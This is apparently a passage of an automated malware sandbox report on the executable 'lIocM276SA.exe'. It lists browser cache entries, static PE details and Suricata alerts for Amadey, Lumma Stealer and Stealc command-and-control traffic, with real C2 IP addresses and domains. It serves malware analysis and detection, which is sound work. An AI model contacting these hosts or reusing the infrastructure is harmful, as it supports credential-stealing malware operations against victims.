LtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UVzb9c:IvPZ6d;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;ZlOOMb:P0I0Ec;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;oVHXxc:HODIOb;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:ww04Df;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;ropkZ:UT1DG;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vEYCNb:FaqsVd;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi"
Preview:	this._hd=this._hd\|\|{};(function(_){var window=this;.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0././.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0././.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT././. SPDX-License-Identifier: Apache-2.0././. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var baa,caa,iaa,uaa,waa,Baa,Iaa,Naa,Waa,Yaa,$aa,cba,dba,iba,mba,nba,qba,sba,tba,vba,uba,xba,oba,gb,yba,Bba,Cba,Dba,Fba,Hba,Lba,Mba,Oba,Pba,Qba,Sba,Tba,Vba,Zba,qb,bca,jca,kca,lca,mca,nca,gca,oca,dca,pca,cca,eca,fca,qca,rca,sca,Cca,Eca,Fca,Hca,Jca,Kca,Oca,Rca,Lca,Qca,Pca,Nca,Mca,Sca,Tca,Xca,Zca,Yca,bda,cda,dda,fda,gda,hda,lda,kda,pda,qda,yda,zda,Ada,Bda,Cda,Dda,rda,Eda,Hda,Jda,Ida,Lda,Nda,Mda,Pda,Oda,Sda,Rda,Uda,Wda,Zda,$da,kea,lea,pea,qea,vea,xea,Hea,Iea,Kea,oea,sea,Nea,Rea,Xea,Pb,afa,dfa,cfa,kfa,.mfa,nfa,qfa,tfa,ufa,wfa,zfa,Cfa,Dfa,Efa,Mfa,Tfa,Yfa,$fa,bga,cga,dga,ega,iga,pga,qga,sga,wga,xga,zga,

Chrome Cache Entry: 194

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4232), with no line terminators
Category:	downloaded
Size (bytes):	4232
Entropy (8bit):	5.531069792601157
Encrypted:	false
SSDEEP:	48:l2IEhgIOafN8fNDzFMqwWgNUIu9ThNpIdgNlLIjeRSbcDNdm7xKAo7:ADHd4tzFlwLNU9xhLIdtjKudi
MD5:	DA43A25BD1F9DD99ABEEE97AE6E6BCA6
SHA1:	FAF739B5A3ACE85BABEF8AF8C123C7B140D5222A
SHA-256:	FC42CAFE3E110C38CB62AB04E51E2F806F308D3ED3F95C9E3AB5D0B7B3C9978A
SHA-512:	CB7ABBCBFF96B0B6C7AA9A674C8DB81FD6D3AD3D1F950B08F6F64AE3BC86E0ECD3DDF05C6542CAD98CE5ED59BBF2C1B510B2598064DE0B42DEB051F1CF368DFD
Malicious:	false
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi"
Preview:	:root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.wHYlTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0)}to{transform:translateY(-100%)}}@keyframes g-snackbar-hide{from{transform:translateY(-100%)}to{transform:translateY(0)}}@keyframes g-snackbar-show-content{from{op

Chrome Cache Entry: 195

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 272 x 92, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	5969
Entropy (8bit):	7.949719859611916
Encrypted:	false
SSDEEP:	96:30VjFRx06o9fWBVE+/hVaf6hQrDTq2W4jnjhwKItTD97TPJn/SHbICKV6A4TT8D+:30XRx0QPE+5VBx2W4/WtTRnBnobpQDHe
MD5:	8F9327DB2597FA57D2F42B4A6C5A9855
SHA1:	1737D3DFB411C07B86ED8BD30F5987A4DC397CC1
SHA-256:	5776CD87617EACEC3BC00EBCF530D1924026033EDA852F706C1A675A98915826
SHA-512:	B807694ED1EF6DFA6CB5D35B46526FF9584D9AAD66CE4DC93CDEB7B8B103A7C78369D1141D53F092EDDEA0441E982D3A16DF6E98959A5557C288B580CF5191E6
Malicious:	false
URL:	https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png
Preview:	.PNG........IHDR.......\............IDATx..]...U..:.................].{.A.A.(......\....1........A@6.......$...(.CXX\|..d...IUu..dz...g..u.....sO.1..g..W.....~..fv..+.TL.z.q.c..e..;..{..._"...`V...NwUwg....L.{6...y...]....2yo.x}^\|.....)....444.....r7.f&.<...t.!.l'8.s..LCCcl...t........ ......;..,a..0.xju........\|.. D%.l._..........]Y.. ...&N.r.~$g...&...Z}.w.3q......RKwm.ihh.I.pL.n..7j.W..%..Ld...@......q7x)..A.x.0..M .H..Wq.g.h..k.\|P..-Q.}.Ca...@.A.....D....x.....vOp.....+.z...N...T..o.?...?.%e....&..#..3.....P..Np9...$m.Ne. ..3y?......]....l.).z...g.^.v.!....-...&..M .Eg..w.K. ..;..@.qiP4yhh.....U.l7X-.u...-.tP..X..D.i......p'.T>Y.\o.TM.....xx&...&..M ..{.MQ...@.......C.ihh...]].ws..L.<.1...M ..>/yl...yhh.Yh..y..n...H.iW!..4444.p'8G.<...4444. .!.$'.._`....&....h=@8..........T.Ao..4444..#..i.q.'t.u........T..+j.ASyjT...u..(f.y.uw...-e.B...5.W........m~..5-\|_">.j....c[o..m+....K.v.Tak_.".\.....<........u.....},..02..'.h.v.^.....s..A..Ctw

Chrome Cache Entry: 196

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4232), with no line terminators
Category:	downloaded
Size (bytes):	4232
Entropy (8bit):	5.531069792601157
Encrypted:	false
SSDEEP:	48:l2IEhgIOafN8fNDzFMqwWgNUIu9ThNpIdgNlLIjeRSbcDNdm7xKAo7:ADHd4tzFlwLNU9xhLIdtjKudi
MD5:	DA43A25BD1F9DD99ABEEE97AE6E6BCA6
SHA1:	FAF739B5A3ACE85BABEF8AF8C123C7B140D5222A
SHA-256:	FC42CAFE3E110C38CB62AB04E51E2F806F308D3ED3F95C9E3AB5D0B7B3C9978A
SHA-512:	CB7ABBCBFF96B0B6C7AA9A674C8DB81FD6D3AD3D1F950B08F6F64AE3BC86E0ECD3DDF05C6542CAD98CE5ED59BBF2C1B510B2598064DE0B42DEB051F1CF368DFD
Malicious:	false
URL:	"https://www.google.com/xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAQAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oFhTcC6qqFSdY-IWvX2meQ47EUcpA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi"
Preview:	:root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.wHYlTd{font-family:Roboto,Arial,sans-serif;font-size:14px;line-height:22px}.yUTMj{font-family:Roboto,Arial,sans-serif;font-weight:400}.VDgVie{text-align:center}.TUOsUe{text-align:left}@keyframes g-snackbar-show{from{pointer-events:none;transform:translateY(0)}to{transform:translateY(-100%)}}@keyframes g-snackbar-hide{from{transform:translateY(-100%)}to{transform:translateY(0)}}@keyframes g-snackbar-show-content{from{op

Chrome Cache Entry: 197

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	102
Entropy (8bit):	5.230584632355439
Encrypted:	false
SSDEEP:	3:VG4D37Jhol2XTYqkDZHG6JElJWdHZ+4LQpNYe:VpDFholwTYTLJkWdHAHpue
MD5:	C20CF4FCD9CEAEFF1B3DA9A4F758322A
SHA1:	F81BF64BE4D9CC4F26AE9FABB2784521C8131142
SHA-256:	5036B770052997294FAFC6EDA55950F8143D4A1A22B4CA1EE5CA4206988BA043
SHA-512:	2A9D4BE573461CD0BED1117F25CFCBCA7DBAF977D2BBABA3E03E39D51E91B09DCF8500B8D9DCF2DDC86E3E3510217B43AF906BB9B76CC4AC4129F041CC275274
Malicious:	false
URL:	"https://www.google.com/async/hpba?yv=3&cs=0&ei=NF8sZ4qbEPzWi-gP9LDl-Qk&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQBAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJCAhAAAAAAAAAAAAAAAAAAACRJi5s/dg%3D0/br%3D1/rs%3DACT90oFs2Zqnxfhjbxgu6kzN0zBzbTyqtQ,_basecss:/xjs/_/ss/k%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/br%3D1/rs%3DACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/ck%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABN5JAABMALABBAgAAAAAAAMAAoQAQRAAAAQAIACsAAAQCACABABEBIEAhAJ4lCkwAiSAgAzg_QggEQAAoCACgABAABBABhoCUQGIAgQAAAIAAAABAAAAgZEAAgEAOgACYAAQCQCA6IEAAAAAQEFAcCYAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oErR92RueQ28tcY4IdxQ4bbOunDyg,_fmt:prog,_id:_NF8sZ4qbEPzWi-gP9LDl-Qk_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwiKhc39zMmJAxV86wIHHXRYOZ8Qj-0KCBU..i"
Preview:	)]}'.22;["RV8sZ5TZBLS9i-gP3brMiAc","2107"]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.657469379852796
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lIocM276SA.exe
File size:	3'169'280 bytes
MD5:	ed91fed1365af41a389141266378cfc8
SHA1:	fdaa4dddc18c04adb903505acdd71d71eee8fc68
SHA256:	c399da828c92ddf5858f839b584084927f5576ab15f842f3acbd840a89df638a
SHA512:	c145bad5f5946e715c6b322d5b531dc80202a8ecdbea33a53d21c3a4a4120039deecb33e3c8fb62dd28300080701c28fb1aabdc0718336abd668ee298c4cde51
SSDEEP:	49152:MBHlNUta/wrqrskVylovLt3J1VupBIzge601xjnYeu:yFLwrijVylovLt3nVupev1+d
TLSH:	47E54B61A50875CFD48A27784427CE82BD6C47F94720C8CBA82D64FE7EABDC215F6D24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x706000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F77A07F294Ah

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x304e40	0x10	jtgdutaj
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x304df0	0x18	jtgdutaj
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	cab163ba66cbc10f6709e161cf277656	False	0.5598168006310096	data	7.091699330201492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b7d16686b376821266a9345c26b7e6d6	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jtgdutaj	0x6b000	0x29a000	0x29a000	afa43c5608e3cd2ce56e2c4d100449c8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mylnqymk	0x305000	0x1000	0x600	ef9d0093e6d43ef00d024ae47a715bce	False	0.6341145833333334	data	5.3345646614374385	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x306000	0x3000	0x2200	5bcbe58d13502e74f30f60387c9e3ea5	False	0.09524356617647059	DOS executable (COM)	1.0709042502163766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T07:32:15.346386+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-07T07:32:53.496223+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49736	TCP
2024-11-07T07:33:05.126473+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49773	185.215.113.43	80	TCP
2024-11-07T07:33:09.345116+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49794	172.67.195.247	80	TCP
2024-11-07T07:33:15.582334+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49787	TCP
2024-11-07T07:33:16.483761+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49832	185.215.113.43	80	TCP
2024-11-07T07:33:22.340591+0100	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	162.230.48.189	56001	192.168.2.4	49876	TCP
2024-11-07T07:33:22.784927+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49882	185.215.113.16	80	TCP
2024-11-07T07:33:29.132152+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49871	TCP
2024-11-07T07:33:30.063637+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49926	185.215.113.43	80	TCP
2024-11-07T07:33:31.025222+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49934	185.215.113.16	80	TCP
2024-11-07T07:33:37.381365+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49970	185.215.113.43	80	TCP
2024-11-07T07:33:42.346983+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50007	185.215.113.43	80	TCP
2024-11-07T07:33:42.639062+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	59858	1.1.1.1	53	UDP
2024-11-07T07:33:42.773013+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50008	185.215.113.206	80	TCP
2024-11-07T07:33:42.785684+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	57974	1.1.1.1	53	UDP
2024-11-07T07:33:43.358425+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	63059	1.1.1.1	53	UDP
2024-11-07T07:33:43.369256+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50012	185.215.113.16	80	TCP
2024-11-07T07:33:43.843932+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	51581	1.1.1.1	53	UDP
2024-11-07T07:33:44.279481+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	62195	1.1.1.1	53	UDP
2024-11-07T07:33:44.324094+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	60453	1.1.1.1	53	UDP
2024-11-07T07:33:44.981574+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:44.981574+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:45.210848+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:45.210848+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50024	172.67.133.135	443	TCP
2024-11-07T07:33:49.705057+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50048	185.215.113.43	80	TCP
2024-11-07T07:33:49.708480+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:33:49.708480+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:33:50.315164+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:33:50.315164+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50052	172.67.133.135	443	TCP
2024-11-07T07:33:59.740264+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	51429	1.1.1.1	53	UDP
2024-11-07T07:34:00.224654+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	55330	1.1.1.1	53	UDP
2024-11-07T07:34:00.601713+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	65186	1.1.1.1	53	UDP
2024-11-07T07:34:02.313928+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	61126	1.1.1.1	53	UDP
2024-11-07T07:34:03.236490+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	58539	1.1.1.1	53	UDP
2024-11-07T07:34:05.683432+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:05.683432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:06.182276+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:06.182276+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50108	172.67.133.135	443	TCP
2024-11-07T07:34:10.035622+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:10.035622+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:10.775077+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:10.775077+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50111	172.67.133.135	443	TCP
2024-11-07T07:34:11.022021+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50112	185.215.113.206	80	TCP
2024-11-07T07:34:17.272148+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	55752	1.1.1.1	53	UDP
2024-11-07T07:34:17.298452+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	63553	1.1.1.1	53	UDP
2024-11-07T07:34:17.326962+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	64608	1.1.1.1	53	UDP
